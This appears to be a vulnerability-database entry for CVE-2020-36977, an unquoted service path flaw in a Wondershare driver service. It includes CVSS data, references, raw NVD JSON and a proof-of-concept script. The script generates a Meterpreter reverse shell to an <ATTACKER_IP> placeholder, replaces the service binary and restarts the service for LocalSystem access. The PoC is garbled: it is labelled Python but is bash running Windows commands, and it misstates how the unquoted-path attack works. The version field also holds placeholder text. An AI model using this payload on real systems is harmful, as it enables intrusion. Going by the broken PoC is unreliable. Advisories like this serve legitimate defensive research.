CVE-2020-36977

Description

Wondershare Driver Install Service contains an unquoted service path vulnerability in the ElevationService executable that allows local attackers to potentially inject malicious code. Attackers can exploit the unquoted path to replace the service binary with a malicious executable, enabling privilege escalation to LocalSystem account.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Wondershare Driver Install Service < 修复版本

Wondershare Driver Install Service ElevationService.exe（所有未打补丁版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash # CVE-2020-36977 PoC - Unquoted Service Path Privilege Escalation # Target: Wondershare Driver Install Service (ElevationService) # Author: [email protected] # Check if vulnerable service exists sc query ElevationService 2>/dev/null # Get service executable path sc qc ElevationService # Create malicious executable in unquoted path # Attacker places payload at: C:\Program Files\Wondershare\Driver\ElevationService.exe PAYLOAD_PATH="C:\\Program Files\\Wondershare\\Driver\\ElevationService.exe" # Generate malicious DLL/payload (example: reverse shell) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f exe -o "$PAYLOAD_PATH" # Wait for service restart or trigger manually # Option 1: Wait for system restart # Option 2: Trigger service restart sc stop ElevationService sc start ElevationService # Alternative: Use icacls to verify permissions icacls "C:\Program Files\Wondershare\Driver"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36977
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36977
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36977/
[4] VulDB https://vuldb.com/cve/CVE-2020-36977
[5] https://www.exploit-db.com/exploits/49101
[6] https://www.vulncheck.com/advisories/wondershare-driver-install-service-help-elevationservice-unquote-service-path
[7] https://www.wondershare.com/
[8] https://www.wondershare.com/drfone/
[9] https://www.exploit-db.com/exploits/49101

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36977", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:10.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wondershare Driver Install Service contains an unquoted service path vulnerability in the ElevationService executable that allows local attackers to potentially inject malicious code. Attackers can exploit the unquoted path to replace the service binary with a malicious executable, enabling privilege escalation to LocalSystem account."}, {"lang": "es", "value": "Wondershare Driver Install Service contiene una vulnerabilidad de ruta de servicio sin comillas en el ejecutable ElevationService que permite a atacantes locales inyectar potencialmente código malicioso. Los atacantes pueden explotar la ruta sin comillas para reemplazar el binario del servicio con un ejecutable malicioso, lo que permite la escalada de privilegios a la cuenta LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49101", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wondershare-driver-install-service-help-elevationservice-unquote-service-path", "source": "[email protected]"}, {"url": "https://www.wondershare.com/", "source": "[email protected]"}, {"url": "https://www.wondershare.com/drfone/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49101", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}